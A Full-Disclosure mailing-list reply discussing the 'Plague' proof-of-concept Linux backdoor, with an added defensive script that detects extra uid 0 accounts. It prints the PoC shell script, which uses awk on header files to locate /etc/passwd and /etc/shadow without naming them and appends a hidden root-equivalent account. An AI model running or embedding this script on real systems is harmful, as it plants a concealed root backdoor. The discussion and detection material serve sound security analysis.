
Re: [Full-disclosure] Plague Proof of Concept Linux backdoor
Hello Andrew,

I shall completely ignore the e-mails that followed your reply, as they
seem to me completely off the subject and, at the same time, some of
them are offensive to me!

Let's go into more details on that backdoor.

I created the file test1.sh containing:

hijacker@hpa:~/hacki$ cat test1.sh
#!/bin/sh
if [ -e /usr/include/paths.h ]

then

        file=`awk 'NR==59 {gsub(/"/,"");print $3}' /usr/include/paths.h`
        sed -n '1p' $file|sed 's/root/plaguePoC/g' >> $file
        file2=`awk 'NR==74 {print $8}' /usr/include/sysexits.h`
        sed -n '1p' $file2|sed 's/root/plaguePoC/g' >> $file2

fi

Then I chmod 700 test1.sh
then I run:

hijacker@hpa:~/hacki$ ./test1.sh
sed: can't read /etc/shadow: Permission denied
./test1.sh: line 7: /etc/shadow: Permission denied
sed: can't read /etc/passwd,: No such file or directory
./test1.sh: line 9: /etc/passwd,: Permission denied


Are you saying I just injected my system with an account with root access
hiding somewhere? Please, clarify.

Thanks,
-Nikolay Kichukov


> On 22 Oct 06, at 04:29, hijacker@xxxxxxxxx wrote:
>> even if they have ssh access, there is still nothing they can do, except
>> to create two files in their $HOME directories containing expressions from
>> paths.h and sysexits.h ?
>>
>> Why would that be considered a backdoor?
>
> The awk commands parse out the strings "/etc/passwd" and "/etc/shadow" from
> the headers. It's still rather easily detected - most of the rootkit-checking
> programs will detect an alternate uid0 account very quickly - but it does
> demonstrate an interesting way of avoiding target strings in the binary.
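The "alternate uid0 account" check Andrew refers to is simple enough to show in full. The script below is an added example, not part of the thread or the PoC: it audits a passwd-format file for uid 0 accounts other than root and for duplicated user names, and it builds a constructed sample that contains the line the PoC would append (the root entry with "root" rewritten to "plaguePoC").

```sh
#!/bin/sh
# Added example: audit a passwd-format file for the artefact the PoC leaves
# behind, i.e. an extra account with uid 0. Not the PoC author's code.
# Usage: audit_passwd /etc/passwd   (or any passwd-format file)

# Print one line per finding:
#   "uid0 <name>"    an account other than root whose uid field is 0
#   "dupuser <name>" a user name that occurs more than once
# Prints nothing when the file is clean.
audit_passwd() {
    awk -F: '
        # passwd lines have exactly 7 fields; skip anything else
        NF != 7 { next }
        # uid field is all zeros (0, 00, ...) but the name is not root
        $3 ~ /^0+$/ && $1 != "root" { print "uid0 " $1 }
        # second and later occurrences of a user name
        seen[$1]++ == 1 { print "dupuser " $1 }
    ' "$1"
}

# Constructed sample: a small stock passwd file, with the line the PoC
# generates (first line copied, root -> plaguePoC) appended at the end.
make_sample() {
    cat > "$1" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
hijacker:x:1000:1000:hijacker,,,:/home/hijacker:/bin/bash
plaguePoC:x:0:0:plaguePoC:/plaguePoC:/bin/bash
EOF
}

# Stand-alone demo: build the sample in a temp file and audit it.
demo_file=$(mktemp)
make_sample "$demo_file"
audit_passwd "$demo_file"      # prints: uid0 plaguePoC
rm -f "$demo_file"
```

The same awk logic can be pointed at /etc/shadow to list any entry whose name has no matching line in /etc/passwd, since the PoC appends to both files.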


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/